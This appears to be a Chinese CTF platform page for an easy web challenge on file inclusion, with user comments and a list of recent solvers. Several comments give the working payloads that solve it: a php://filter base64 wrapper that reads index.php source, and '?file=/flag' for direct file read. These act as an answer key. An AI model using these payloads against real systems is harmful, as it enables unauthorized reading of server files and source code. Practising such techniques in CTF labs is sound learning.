文件包含WEB 未解决

分数: 20 金币: 2
题目作者: harry
一  血: 不会CTF的麻风
一血奖励: 1金币
解  决: 12270
提  示:
描  述:
flag{}
评论
HKzhou 5小时前

flag{***}

回复 0

VVang 6天前

用php://filter包含index.php,然后base64解码得到flag

回复 1

聪10011 20天前

猜flag位置,file=/flag

回复 0

8208240204 1月前

?file=php://filter/read=convert.base64-encode/resource=index.php 然后发现==表明是base64解码得到flag

回复 1

2686213396 1月前

http://117.72.52.127:17540/index.php?file=php://filter/convert.base64-encode/resource=index.php,php伪协议,读取 index.php文件

回复 0

zhuizhui 2月前

?file=php://filter/read=convert.base64-encode/resource=index.php

回复 0

17734916426 4月前

index.php?file=/flag

回复 0

shingu 5月前

这题过于简单了。?file=/flag。

回复 2

HK1ng 8月前

使用伪协议来解题,启动靶机发现有超链接,点击后发现有file变量,然后页面有index.php,于是猜想是不是传一个index.php,果然不是。然后就给出这个提示,想办法去读一下这个,然后这里就是用了php://filter/read=convert.base64encode/resource=filepath,表示以base64编码的方式进行读取指定路径的文件。然后解码就可以看到。

回复 3

000ooo 9月前

/index.php?file=/flag

回复 1
哈哈哈嘿嘿嘿 6月前

为什么

回复 0

WriteUp

image
harry

2 金币

评分(11)

解题动态

wz666 攻破了该题 18分钟前
millim 攻破了该题 32分钟前
HKzhou 攻破了该题 5小时前
lin666 攻破了该题 8小时前
foxkiller 攻破了该题 1天前
爱吃馒头 攻破了该题 1天前
jhon 攻破了该题 1天前
desireart 攻破了该题 1天前
暗A166668 攻破了该题 2天前
吴王饭差 攻破了该题 2天前
欲语泪先流 攻破了该题 2天前
统计系1008 攻破了该题 2天前
白六真的6 攻破了该题 3天前
ZQCblack 攻破了该题 3天前
baotou91 攻破了该题 3天前
2021060287 攻破了该题 3天前
5326 攻破了该题 4天前
jkljkl 攻破了该题 4天前
Adwuwuuuuc 攻破了该题 4天前
bugkubxl 攻破了该题 4天前
问题反馈